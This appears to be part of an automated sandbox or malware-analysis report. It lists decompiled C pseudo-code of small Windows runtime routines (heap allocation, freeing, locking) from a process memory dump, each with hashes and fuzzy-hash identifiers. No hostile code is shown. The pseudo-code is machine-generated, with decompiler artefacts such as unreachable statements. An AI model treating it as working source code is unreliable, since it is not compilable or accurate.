                                                                          0x011b92ae
                                                                          0x011b92af
                                                                          0x011b92b0
                                                                          0x011b92b4
                                                                          0x011b92bb
                                                                          0x011b92bb
                                                                          0x011b92c5

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                                          • Instruction ID: 06fcc979675c7d5d22cad6278ba2579893d07cd5fd94ce32460b533ccfc6c509
                                                                          • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                                          • Instruction Fuzzy Hash: B9E02B723405416BE7199E59CCC0F43376DDFD2728F004078F6005E242C7E5DC0A87A0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0119746D, Relevance: .0, Instructions: 31COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 88%
                                                                          			E0119746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E0118EB70(__ecx, 0x12679a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E011B95D0();
							L011977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}









                                                                          0x0119746d
                                                                          0x0119746d
                                                                          0x0119746d
                                                                          0x01197471
                                                                          0x01197488
                                                                          0x011df92d
                                                                          0x0119748e
                                                                          0x01197491
                                                                          0x01197495
                                                                          0x011df937
                                                                          0x011df93a
                                                                          0x011df94e
                                                                          0x011df953
                                                                          0x011df956
                                                                          0x011df956
                                                                          0x01197495
                                                                          0x00000000
                                                                          0x01197488
                                                                          0x01197473
                                                                          0x01197478
                                                                          0x0119747d
                                                                          0x01197481
                                                                          0x00000000
                                                                          0x01197481
                                                                          0x0119747d
                                                                          0x0119747a
                                                                          0x00000000

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f63d382e785618aebc13eddea32c06f73e25e5b23e76b853c41f918ec2d9696e
                                                                          • Instruction ID: 69191b4513daf9612f92e2b815203257a94ed0b4480d4ab648138512bf317a13
                                                                          • Opcode Fuzzy Hash: f63d382e785618aebc13eddea32c06f73e25e5b23e76b853c41f918ec2d9696e
                                                                          • Instruction Fuzzy Hash: 1DF0E934961145EADF0E976CC840F79FFB1AF05214F054115E571AB1D3F7249902CF96
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 01248CD6, Relevance: .0, Instructions: 31COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 36%
                                                                          			E01248CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x126d360 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E01197D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E011BB640(E011B9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                                                                          0x01248ce5
                                                                          0x01248ced
                                                                          0x01248cf0
                                                                          0x01248cfb
                                                                          0x01248d0d
                                                                          0x01248cfd
                                                                          0x01248d06
                                                                          0x01248d06
                                                                          0x01248d18
                                                                          0x01248d19
                                                                          0x01248d1b
                                                                          0x01248d20
                                                                          0x01248d33

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 861124abeffa808fda979c8595ae7d245e8890f411bbf72a861039cb9c8fc68e
                                                                          • Instruction ID: 2840fcd4dae1445ba96608a83ec9713c9e5fdfd52a48fcdba111019672d0b84b
                                                                          • Opcode Fuzzy Hash: 861124abeffa808fda979c8595ae7d245e8890f411bbf72a861039cb9c8fc68e
                                                                          • Instruction Fuzzy Hash: C8F0E270A1520DAFCB08DBF8E846EAE77B4EF19304F200199E912EB2C0EA34D900CB54
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 01174F2E, Relevance: .0, Instructions: 31COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E01174F2E(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						E012488F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				}
				_t18 = __ecx + 0x30;
				if(E0119C5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x1151030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}









                                                                          0x01174f2e
                                                                          0x01174f34
                                                                          0x01174f38
                                                                          0x011d0b85
                                                                          0x011d0b85
                                                                          0x011d0b89
                                                                          0x011d0b9a
                                                                          0x011d0b9a
                                                                          0x011d0b9f
                                                                          0x00000000
                                                                          0x011d0b9f
                                                                          0x011d0b94
                                                                          0x011d0b98
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011d0b98
                                                                          0x01174f3e
                                                                          0x01174f48
                                                                          0x00000000
                                                                          0x01174f6e
                                                                          0x00000000
                                                                          0x01174f70

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 77afe80c3004e87c53369774c3c2839e08f3aecd9c1cf7ad4558bbfed2924ef0
                                                                          • Instruction ID: cb0a6c9169aa6f4f593f35cf6d7804f11dc03aea7575418ce0ff0f9c883dcb10
                                                                          • Opcode Fuzzy Hash: 77afe80c3004e87c53369774c3c2839e08f3aecd9c1cf7ad4558bbfed2924ef0
                                                                          • Instruction Fuzzy Hash: 2EF0E23A5296849FE77ACB1CC144B22BBE4AB08778F454464E40587A22C728ED40C780
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 01248B58, Relevance: .0, Instructions: 31COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 36%
                                                                          			E01248B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x126d360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E01197D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E011BB640(E011B9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                                                                          0x01248b67
                                                                          0x01248b6f
                                                                          0x01248b72
                                                                          0x01248b7d
                                                                          0x01248b8f
                                                                          0x01248b7f
                                                                          0x01248b88
                                                                          0x01248b88
                                                                          0x01248b9a
                                                                          0x01248b9b
                                                                          0x01248b9d
                                                                          0x01248ba2
                                                                          0x01248bb5

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e76a8773fdd37c8148757ec098bf1326e51c0312f102a03f9d421ecc8f6d1db6
                                                                          • Instruction ID: dfe674db715e4a4b37979b900cdc5bc318e61b44a4d20a75ebd60b1d879e5dd1
                                                                          • Opcode Fuzzy Hash: e76a8773fdd37c8148757ec098bf1326e51c0312f102a03f9d421ecc8f6d1db6
                                                                          • Instruction Fuzzy Hash: 6EF05EB0A2425DAFDB18EBA8D946A6E77A4EF04304F140459EA05EB2D0EB74D900C798
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 011AA44B, Relevance: .0, Instructions: 29COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E011AA44B(signed int __ecx) {
				intOrPtr _t13;
				signed int _t15;
				signed int* _t16;
				signed int* _t17;

				_t13 =  *0x1267b9c; // 0x0
				_t15 = __ecx;
				_t16 = L01194620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
				if(_t16 == 0) {
					return 0;
				}
				 *_t16 = _t15;
				_t17 =  &(_t16[2]);
				E011BFA60(_t17, 0, _t15 << 2);
				return _t17;
			}







                                                                          0x011aa44b
                                                                          0x011aa453
                                                                          0x011aa472
                                                                          0x011aa476
                                                                          0x00000000
                                                                          0x011aa493
                                                                          0x011aa47a
                                                                          0x011aa47f
                                                                          0x011aa486
                                                                          0x00000000

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c21896cc6bfb722b50433fab74b026468c71286a16082be6dc5bb65b3d078fed
                                                                          • Instruction ID: 4aed0c4978bd2c338d0ad8b274a889618145e5f8698b55f0a9332e98021a4b0e
                                                                          • Opcode Fuzzy Hash: c21896cc6bfb722b50433fab74b026468c71286a16082be6dc5bb65b3d078fed
                                                                          • Instruction Fuzzy Hash: DCE09272A01422ABD3255A58BC00F66779DDFE5655F0A4035F604D7254D728DD02C7E0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0117F358, Relevance: .0, Instructions: 28COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 79%
                                                                          			E0117F358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E011AF3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L01194620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}






                                                                          0x0117f35d
                                                                          0x0117f361
                                                                          0x0117f367
                                                                          0x0117f372
                                                                          0x0117f38c
                                                                          0x0117f38c
                                                                          0x0117f394

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                                          • Instruction ID: 703ccab9ce64d922ede63b40923a6d6edadf434a83a8adb5bd47db272bea8e1b
                                                                          • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                                          • Instruction Fuzzy Hash: 51E02032A41119FBDB3596DD9E05F9BBFBCDB54A60F000155FA04D7150D6749D01C2D1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0118FF60, Relevance: .0, Instructions: 22COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E0118FF60(intOrPtr _a4) {
				void* __ecx;
				void* __ebp;
				void* _t13;
				intOrPtr _t14;
				void* _t15;
				void* _t16;
				void* _t17;

				_t14 = _a4;
				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x11511a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					return E012488F5(_t13, _t14, _t15, _t16, _t17, __eflags);
				} else {
					return E01190050(_t14);
				}
			}










                                                                          0x0118ff66
                                                                          0x0118ff6b
                                                                          0x00000000
                                                                          0x0118ff8f
                                                                          0x00000000
                                                                          0x0118ff8f

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 37ead3f4cd20b5e01e4ff57d0f1bcb560b616733b4da84791904edba8204e187
                                                                          • Instruction ID: ce7f43c2b0647aaaddc40311b403982b6f0ea07acb25f83c3ffe0f06ecbb75f9
                                                                          • Opcode Fuzzy Hash: 37ead3f4cd20b5e01e4ff57d0f1bcb560b616733b4da84791904edba8204e187
                                                                          • Instruction Fuzzy Hash: E3E0D8B2315206DFD73DE759D140F25379C9B52621F19C05DE40847102C721D842CA87
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 012041E8, Relevance: .0, Instructions: 21COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 82%
                                                                          			E012041E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t5;
				void* _t14;

				_push(8);
				_push(0x12508f0);
				_t5 = E011CD08C(__ebx, __edi, __esi);
				if( *0x12687ec == 0) {
					E0118EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
					if( *0x12687ec == 0) {
						 *0x12687f0 = 0x12687ec;
						 *0x12687ec = 0x12687ec;
						 *0x12687e8 = 0x12687e4;
						 *0x12687e4 = 0x12687e4;
					}
					 *(_t14 - 4) = 0xfffffffe;
					_t5 = L01204248();
				}
				return E011CD0D1(_t5);
			}





                                                                          0x012041e8
                                                                          0x012041ea
                                                                          0x012041ef
                                                                          0x012041fb
                                                                          0x01204206
                                                                          0x0120420b
                                                                          0x01204216
                                                                          0x0120421d
                                                                          0x01204222
                                                                          0x0120422c
                                                                          0x01204231
                                                                          0x01204231
                                                                          0x01204236
                                                                          0x0120423d
                                                                          0x0120423d
                                                                          0x01204247

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: fc234d6dc5f62a89fed828baabde4acbe85aa964c0d97317a84636baebc2ce08
                                                                          • Instruction ID: be2aac881ccd31a023ed92ec86dca09809719d5d9ae18ab8a9e834780c1a4165
                                                                          • Opcode Fuzzy Hash: fc234d6dc5f62a89fed828baabde4acbe85aa964c0d97317a84636baebc2ce08
                                                                          • Instruction Fuzzy Hash: A9F0F87A561741DFCBBAEBA9A50C7143AA4F754716F40C16AD2008A2E9C73844A0CF81
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0122D380, Relevance: .0, Instructions: 21COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E0122D380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L0117E8B0(__ecx, _a4, 0xfff);
					L011977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}




                                                                          0x0122d38a
                                                                          0x0122d39b
                                                                          0x0122d3b1
                                                                          0x00000000
                                                                          0x0122d3b6
                                                                          0x00000000

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                                          • Instruction ID: 8c7a268e2e094a96f05e4943a97cab266d353e38a041e4a7964ed98491b0b61b
                                                                          • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                                          • Instruction Fuzzy Hash: AAE0C231291619BBDF266F84CC00FAD7B66DF507A4F104031FE085B790C6719C91DAC4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 011AA185, Relevance: .0, Instructions: 20COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E011AA185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0x12667e4 >= 0xa) {
					if(_t5 < 0x1266800 || _t5 >= 0x1266900) {
						return L011977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E01190010(0x12667e0, _t5);
				}
			}





                                                                          0x011aa190
                                                                          0x011aa1a6
                                                                          0x011aa1c2
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011aa192
                                                                          0x011aa192
                                                                          0x011aa19f
                                                                          0x011aa19f

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: be3c5d921f6c773194c3de66310d1f6ac415c37c088f0a428a0fcf840fee4b97
                                                                          • Instruction ID: a77b933e3baef0a34d55ed1417195bd28bb539404da50d987db16bf8f620fd76
                                                                          • Opcode Fuzzy Hash: be3c5d921f6c773194c3de66310d1f6ac415c37c088f0a428a0fcf840fee4b97
                                                                          • Instruction Fuzzy Hash: 7ED05B711710406ACB2E5750A978B253A5AFF85754F74440DF2074F5E4EF5498D4D188
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 011A16E0, Relevance: .0, Instructions: 17COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E011A16E0(void* __edx, void* __eflags) {
				void* __ecx;
				void* _t3;

				_t3 = E011A1710(0x12667e0);
				if(_t3 == 0) {
					_t6 =  *[fs:0x30];
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						return L01194620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
					}
				} else {
					L1:
					return _t3;
				}
			}





                                                                          0x011a16e8
                                                                          0x011a16ef
                                                                          0x011a16f3
                                                                          0x011a16fe
                                                                          0x00000000
                                                                          0x011a1700
                                                                          0x011a170d
                                                                          0x011a170d
                                                                          0x011a16f2
                                                                          0x011a16f2
                                                                          0x011a16f2
                                                                          0x011a16f2

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9e15657b11a46f1929da07ae1a10e07dbd3eccc849886f0c0ad7db21cd78b396
                                                                          • Instruction ID: 619ea09dea7e286d321175cce9963b7115fe07b004f041545b44b1e63630bcd9
                                                                          • Opcode Fuzzy Hash: 9e15657b11a46f1929da07ae1a10e07dbd3eccc849886f0c0ad7db21cd78b396
                                                                          • Instruction Fuzzy Hash: 46D0A975240201B2EE2E5B189804B242E56EB90B89FB8006CF20B898D0CFE4CCA2E08C
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 011F53CA, Relevance: .0, Instructions: 16COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E011F53CA(void* __ebx) {
				intOrPtr _t7;
				void* _t13;
				void* _t14;
				intOrPtr _t15;
				void* _t16;

				_t13 = __ebx;
				if( *((char*)(_t16 - 0x65)) != 0) {
					E0118EB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					_t7 =  *((intOrPtr*)(_t16 - 0x64));
					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
				}
				if(_t15 != 0) {
					L011977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
					return  *((intOrPtr*)(_t16 - 0x64));
				}
				return _t7;
			}








                                                                          0x011f53ca
                                                                          0x011f53ce
                                                                          0x011f53d9
                                                                          0x011f53de
                                                                          0x011f53e1
                                                                          0x011f53e1
                                                                          0x011f53e6
                                                                          0x011f53f3
                                                                          0x00000000
                                                                          0x011f53f8
                                                                          0x011f53fb

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                                          • Instruction ID: 64e227ab403f606870d65c4f15deaaaed0d1807ae92624366a9cc6e8b401fb11
                                                                          • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                                          • Instruction Fuzzy Hash: 00E08C31944A809BCF1AEB4CCA50F4EBBF6FB44B00F190008A1085B661C724AC00CB00
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 011A35A1, Relevance: .0, Instructions: 12COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E011A35A1(void* __eax, void* __ebx, void* __ecx) {
				void* _t6;
				void* _t10;
				void* _t11;

				_t10 = __ecx;
				_t6 = __eax;
				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
				}
				if( *((char*)(_t11 - 0x1a)) != 0) {
					return E0118EB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				}
				return _t6;
			}






                                                                          0x011a35a1
                                                                          0x011a35a1
                                                                          0x011a35a5
                                                                          0x011a35ab
                                                                          0x011a35ab
                                                                          0x011a35b5
                                                                          0x00000000
                                                                          0x011a35c1
                                                                          0x011a35b7

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                                          • Instruction ID: 749445356ac019ee13b8826311923a0bb80c798927d319fec3393250849f8786
                                                                          • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                                          • Instruction Fuzzy Hash: 65D0A9398621819AEB0EAF1CC2187683FB2BB00208FD82065809206852E33A4A0ACE01
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0118AAB0, Relevance: .0, Instructions: 12COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E0118AAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}




                                                                          0x0118aab6
                                                                          0x0118aabb
                                                                          0x011da442
                                                                          0x00000000
                                                                          0x011da448
                                                                          0x011da454
                                                                          0x011da454
                                                                          0x0118aac1
                                                                          0x0118aac1
                                                                          0x0118aac6
                                                                          0x0118aac6

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                                          • Instruction ID: 45348420790ad9e4e0a1dfbb9d48fac0c2fc69a43bb81052844609cfbf59b57c
                                                                          • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                                          • Instruction Fuzzy Hash: 17D0E935352980CFD61BDB1DD554B1577A4BF44B44FC54490E501CBB62E72CD944CA00
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 011FA537, Relevance: .0, Instructions: 11COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E011FA537(intOrPtr _a4, intOrPtr _a8) {

				return L01198E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
			}



                                                                          0x011fa553

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                                          • Instruction ID: 477a63842342b85813494797027e55a8def08523ecf9471d20007b049c38d28f
                                                                          • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                                          • Instruction Fuzzy Hash: E0C01232080248BBCB126E81CC00F467B2AFBA4B60F008010BA180A5608632E970EA84
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0117DB40, Relevance: .0, Instructions: 11COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E0117DB40() {
				signed int* _t3;
				void* _t5;

				_t3 = L01194620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}





                                                                          0x0117db4d
                                                                          0x0117db54
                                                                          0x0117db5f
                                                                          0x0117db56
                                                                          0x0117db56
                                                                          0x0117db5c
                                                                          0x0117db5c

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                                          • Instruction ID: 18a6532db0f1b707535b9cccd149c0e7f13eb15bcf9bbc3dcb506b241663d882
                                                                          • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                                          • Instruction Fuzzy Hash: 54C08C70280A01AAEF2A1F20CE01B103AA0BB11B09F8800A06301DA4F0DB78D802E600
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0117AD30, Relevance: .0, Instructions: 10COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E0117AD30(intOrPtr _a4) {

				return L011977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}



                                                                          0x0117ad49

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                                          • Instruction ID: 84aa89d124d73da26c38b019c495d2e54671d2a727d9fa8d2da6d62424c865dc
                                                                          • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                                          • Instruction Fuzzy Hash: 98C02B330C0648BBCB166F45CD00F057F2DEBA0B60F000020F6040B6B1CA32EC60D988
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 01193A1C, Relevance: .0, Instructions: 10COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E01193A1C(intOrPtr _a4) {
				void* _t5;

				return L01194620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}




                                                                          0x01193a35

                                                                          Memory Dump Source
